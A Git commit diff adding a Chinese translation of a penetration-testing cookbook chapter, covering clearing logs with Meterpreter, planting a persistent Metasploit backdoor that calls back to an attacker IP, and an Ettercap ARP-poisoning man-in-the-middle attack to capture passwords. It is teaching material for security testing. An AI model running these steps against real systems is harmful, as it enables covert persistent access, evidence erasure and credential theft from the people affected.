提交 7dc547df 编写于 作者: W wizardforcel

ch7

上级 373d71bf
......@@ -329,3 +329,133 @@
### 工作原理
这个秘籍中,我们使用 Meterpreter 来清理我们在目标主机上的踪迹。我们从 Meterpreter 中开始这个秘籍,并启动了 IRB(一个 Ruby 解释器 shell)。下面,我们指定了想要清理的文件,并且最后键入了`Log.clear `命令来清理日志。要记住,一旦我们黑进了某个主机,你需要在最后执行这一步。你不能在清理踪迹之后再执行更多的操作,这样只会更加更多的日志条目。
## 7.6 创建永久后门
这个秘籍中,我们会使用 Metasploit persistence 来创建永久后门。一旦你成功获得了目标机器的访问权限,你需要探索重新获得机器访问权的方式,而不需要再次黑进它。如果目标机器的用户做了一些事情来终端连接,比如重启机器,后门的作用就是允许重新建立到你机器的连接。这就是创建后门非常方便的原因,它可以让你控制目标机器的访问。
### 准备
为了执行这个秘籍,我们需要:
+ 内部网络或互联网的连接。
+ 使用 Metasploit 框架的具有漏洞的主机。
### 操作步骤
让我们开始植入我们的永久后门。你需要使用 Metasploit 攻击某个主机来获得 Meterpreter shell。你可以使用第六章的秘籍之一,来通过 Metasploit 获得目标主机的访问。
1. 一旦你通过 Metasploit 和 Meterpreter shell 获得了受害者的访问权限,等待你的 Meterpreter 显示提示符。
![](img/7-6-1.jpg)
2. 下面,我们需要运行 persistence,以便创建我们的后门。我们打开帮助文件:
```
run persistence –h
```
3. 永久后门有几个选项,包括:
+ `-A`:这个选项会自动启动一个匹配的多重处理器来链接到代理端。
+ `-S`:这个选项让后门自动化启动为系统服务。
+ `-U`:这个选项让后门在用户启动系统时自动启动。
+ `-i`:这个选项设置两次尝试回复攻击者机器之间的秒数。
+ `-p`:这个选项设置攻击者机器上 Metasploit 的监听端口。
+ `-P`:这个选项设置所用的载荷。默认使用` Reverse_tcp `,并且它通常是你想使用的东西。
+ `-r`:这个选项设置攻击者机器的 IP 地址。
4. 现在,我们指定命令来建立后门:
```
run persistence –U –A –i 10 – 8090 –r 192.168.10.109
```
5. 后门现在已经建立了。如果成功的话,你会注意到你有了第二个 Meterpreter 会话。
![](img/7-6-2.jpg)
### 工作原理
这个秘籍中,我们使用 Meterpreter 来建立永久后门。我们在黑进目标主机并获得 Meterpreter shell 之后开始了这个秘籍。之后我们通过浏览帮助文档那个,探索了一些可用的永久化方式。最后,我们通过运行安装命令并设置它的选项来完成后门的安装。
## 7.7 中间人(MITM)攻击
这个秘籍中,我们会对目标进行中间人(MITM)攻击。MITM攻击允许我们窃听目标和别人的通信。在我们的例子中,当某个 Windows 主机在<http://www.yahoo.com>收发邮件时,我们使用 Ettercap 来窃听它的通信。
### 准备
为了执行这个秘籍,我们需要:
+ 无线网络连接
+ 连接到无线网络的机器
### 操作步骤
让我们启动 Ettercap 来开始中间人攻击。
1. 打开终端窗口并启动 Ettercap。使用`-G`选项加载 GUI:
```
ettercap –G
```
![](img/7-7-1.jpg)
2. 我们以打开` Unified sniffing`(统一嗅探)开始。你可以按下`Shift + U`或者访问菜单中的` Sniff | Unified sniffing`
![](img/7-7-2.jpg)
3. 选择网络接口。在发起 MITM 攻击的情况中,我们应该选项我们的无线接口。
![](img/7-7-3.jpg)
4. 下面,我们打开`Scan for hosts`(扫描主机)。可以通过按下`Ctrl + S`或访问菜单栏的` Hosts | Scan for hosts`来完成。
![](img/7-7-4.jpg)
5. 下面,我们得到了`Host List`(主机列表)。你可以按下`H`或者访问菜单栏的`Hosts | Host List`
![](img/7-7-5.jpg)
6. 我们下面需要选择或设置我们的目标。在我们的例子中,我们选择`192.168.10.111`作为我们的`Target 1`,通过选中它的 IP 地址并按下` Add To Target 1 `(添加到目标 1)按钮。
![](img/7-7-6.jpg)
7. 现在我们能够让 Ettercap 开始嗅探了。你可以按下`Ctrl + W`或访问菜单栏的` Start | Start sniffing`
![](img/7-7-7.jpg)
8. 最后,我们开始进行 ARP 毒化。访问菜单栏的`Mitm | Arp poisoning`
![](img/7-7-8.jpg)
9. 在出现的窗口中,选中` Sniff remote connections`(嗅探远程连接)的选项。
![](img/7-7-9.jpg)
0. 取决于网络环境,我们会看到信息。
![](img/7-7-10.jpg)
1. 一旦我们找到了想要找的信息(用户名和密码)。我们可以关闭 Ettercap。你可以按下`Ctrl + E`或访问菜单栏的`Start | Stop sniffing`来完成它。
![](img/7-7-11.jpg)
2. 现在我们关闭 ARP 毒化,使网络恢复正常。
![](img/7-7-12.jpg)
### 工作原理
这个秘籍包括 MITM 攻击,它通过 ARP 包毒化来窃听由用户传输的无线通信。
> 你可以通过浏览<http://en.wikipedia.org/wiki/Man-in-the-middle_attack#Example_of_an_attack>来了解更多关于 MITM 的信息。
......@@ -175,7 +175,7 @@ Hydra 支持许多协议,包括(但不仅限于)FTP、HTTP、HTTPS、MySQL
### 准备
这个秘籍需要局域网的接。
这个秘籍需要局域网的接。
### 操作步骤
......
Markdown is supported
0% .
You are about to add 0 people to the discussion. Proceed with caution.
先完成此消息的编辑!
想要评论请 注册